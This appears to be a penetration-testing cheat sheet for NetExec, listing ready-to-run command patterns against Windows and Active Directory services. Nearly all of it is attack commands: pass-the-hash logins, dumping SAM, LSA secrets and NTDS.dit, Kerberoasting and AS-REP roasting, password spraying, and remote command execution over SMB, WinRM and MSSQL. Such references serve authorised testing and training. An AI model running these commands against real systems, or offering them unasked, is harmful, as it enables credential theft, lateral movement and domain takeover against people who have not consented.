NetExec
Overview
NetExec (nxc) is a network service exploitation tool that supports SMB, WinRM, LDAP, MSSQL, SSH, RDP, and other protocols. It excels at spraying credentials, enumerating Active Directory, executing commands across multiple targets, and extracting sensitive data. NetExec is the successor to CrackMapExec (CME). On Kali: sudo apt install -y netexec.
ATT&CK Mapping
- Tactics: TA0007 - Discovery, TA0008 - Lateral Movement
- Techniques: T1018 - Remote System Discovery, T1021.002 - SMB/Windows Admin Shares
Authentication Patterns
# NetExec
# https://github.com/Pennyw0rth/NetExec
# Password
nxc <protocol> <target> -u <user> -p <password>
# NTLM hash (pass-the-hash)
nxc <protocol> <target> -u <user> -H <ntlm_hash>
# Domain authentication
nxc <protocol> <target> -u <user> -p <password> -d <domain>
# Local authentication
nxc <protocol> <target> -u <user> -p <password> --local-auth
# Multiple targets
nxc <protocol> <targets_file> -u <user> -p <password>
nxc <protocol> 10.10.10.0/24 -u <user> -p <password>
SMB Module
# NetExec
# https://github.com/Pennyw0rth/NetExec
# Enumerate hosts (no auth)
nxc smb 10.10.10.0/24
# Check credentials (Pwn3d! = admin access)
nxc smb <target> -u <user> -p <password>
# Execute commands
nxc smb <target> -u <user> -p <password> -x "whoami"
nxc smb <target> -u <user> -p <password> -X "Get-Process"
# Enumerate shares
nxc smb <target> -u <user> -p <password> --shares
# Spider shares for files
nxc smb <target> -u <user> -p <password> -M spider_plus
# Dump SAM hashes
nxc smb <target> -u <admin> -p <password> --sam
# Dump LSA secrets
nxc smb <target> -u <admin> -p <password> --lsa
# Dump NTDS.dit (DCSync)
nxc smb <dc_ip> -u <admin> -p <password> --ntds
# RID brute force (user enumeration)
nxc smb <target> -u <user> -p <password> --rid-brute
# Enumerate logged-on users
nxc smb <target> -u <user> -p <password> --loggedon-users
# Pass the hash
nxc smb <target> -u <user> -H <ntlm_hash>
LDAP Module
# NetExec
# https://github.com/Pennyw0rth/NetExec
# Enumerate domain users
nxc ldap <dc_ip> -u <user> -p <password> --users
# Get domain SID
nxc ldap <dc_ip> -u <user> -p <password> --get-sid
# Password policy
nxc ldap <dc_ip> -u <user> -p <password> --pass-pol
# Kerberoasting
nxc ldap <dc_ip> -u <user> -p <password> --kerberoasting output.txt
# AS-REP Roasting
nxc ldap <dc_ip> -u <user> -p <password> --asreproast output.txt
# Find delegation
nxc ldap <dc_ip> -u <user> -p <password> --find-delegation
nxc ldap <dc_ip> -u <user> -p <password> --trusted-for-delegation
# Enumerate trusts (via BloodHound collection)
nxc ldap <dc_ip> -u <user> -p <password> --bloodhound -c Trusts
# BloodHound collection
nxc ldap <dc_ip> -u <user> -p <password> --bloodhound --dns-server <dc_ip> -c All
WinRM Module
# NetExec
# https://github.com/Pennyw0rth/NetExec
# Check WinRM access
nxc winrm <target> -u <user> -p <password>
# Execute commands
nxc winrm <target> -u <user> -p <password> -x "whoami"
nxc winrm <target> -u <user> -p <password> -X "Get-Process"
MSSQL Module
# NetExec
# https://github.com/Pennyw0rth/NetExec
# Check MSSQL access
nxc mssql <target> -u <user> -p <password>
# Windows auth
nxc mssql <target> -u <user> -p <password> -d <domain>
# Execute SQL
nxc mssql <target> -u <user> -p <password> -q "SELECT system_user"
# Execute OS command (requires xp_cmdshell)
nxc mssql <target> -u <user> -p <password> -x "whoami"
Password Spraying
# NetExec
# https://github.com/Pennyw0rth/NetExec
# Spray one password across multiple users
nxc smb <dc_ip> -u users.txt -p 'Password123' --continue-on-success
# Spray with hash
nxc smb <dc_ip> -u users.txt -H <ntlm_hash> --continue-on-success
# Multiple protocols
nxc winrm <dc_ip> -u users.txt -p 'Password123' --continue-on-success
nxc ssh <target> -u users.txt -p 'Password123' --continue-on-success
Output Options
# NetExec
# https://github.com/Pennyw0rth/NetExec
# Log results to file
nxc smb <target> -u <user> -p <password> --log output.log
# Export domain users to file
nxc smb <target> -u <user> -p <password> --users-export users.txt